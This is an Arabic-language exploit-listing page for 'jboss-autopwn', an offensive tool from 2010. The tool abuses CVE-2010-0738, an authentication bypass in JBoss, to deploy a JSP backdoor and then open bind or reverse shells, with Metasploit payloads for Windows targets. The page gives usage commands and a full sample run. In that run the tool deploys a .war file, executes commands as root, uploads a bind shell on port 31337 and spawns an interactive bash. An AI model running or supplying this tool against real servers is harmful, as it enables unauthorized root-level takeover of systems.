## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-GITCOLLECT-JBOSS-AUTOPWN
# jboss-autopwn
JBoss Autopwn كما تم عرضه في BlackHat Europe 2010 - هذه النسخة تتضمن CVE-2010-0738، ثغرة تجاوز المصادقة في JBoss عبر التلاعب بـ VERB والتي اكتشفتها Minded Security
C. Papathanasiou 2010
# المقدمة
يقوم هذا السكريبت الخاص بـ JBoss بنشر واجهة JSP على الخادم المستهدف. بمجرد النشر، يستخدم السكريبت إمكانات التحميل وتنفيذ الأوامر لتوفير جلسة تفاعلية.
الميزات تتضمن:
* دعم متعدد المنصات - تم اختباره على أهداف ويندوز ولينكس وماك
* دعم لصدفة ملزمة وصدفة عكسية
* دعم لصفحات Meterpreter و VNC لأهداف ويندوز
# التنصيب
الاعتماديات تشمل:
* Netcat
* Curl
* Metasploit v3، مثبت في المسار الحالي باسم "framework3"
# الاستخدام
استخدم e.sh لأهداف *nix التي تستخدم bind_tcp و reverse_tcp
root@kitploit:~
./e.sh target_ip tcp_port
استخدم e2.sh لأهداف ويندوز التي يمكنها تنفيذ حمولات Metasploit لويندوز
root@kitploit:~
/e2.sh target_ip tcp_port
# أمثلة
صدفة لينكس ملزمة:
root@kitploit:~
[root@nitrogen jboss]# ./e.sh 192.168.1.2 8080 2>/dev/null
[x] Retrieving cookie
[x] Now creating BSH script...
[x] .war file created successfully in /tmp
[x] Now deploying .war file:
http://192.168.1.2:8080/browser/browser/browser.jsp
[x] Running as user...:
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[x] Server uname...:
Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
[!] Would you like to upload a reverse or a bind shell? bind
[!] On which port would you like the bindshell to listen on? 31337
[x] Uploading bind shell payload..
[x] Verifying if upload was successful...
-rwxrwxrwx 1 root root 172 2009-11-22 19:48 /tmp/payload
[x] You should have a bind shell on 192.168.1.2:31337..
[x] Dropping you into a shell...
Connection to 192.168.1.2 31337 port [tcp/*] succeeded!
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
python -c 'import pty; pty.spawn("/bin/bash")'
[root@nitrogen /]# full interactive shell :-)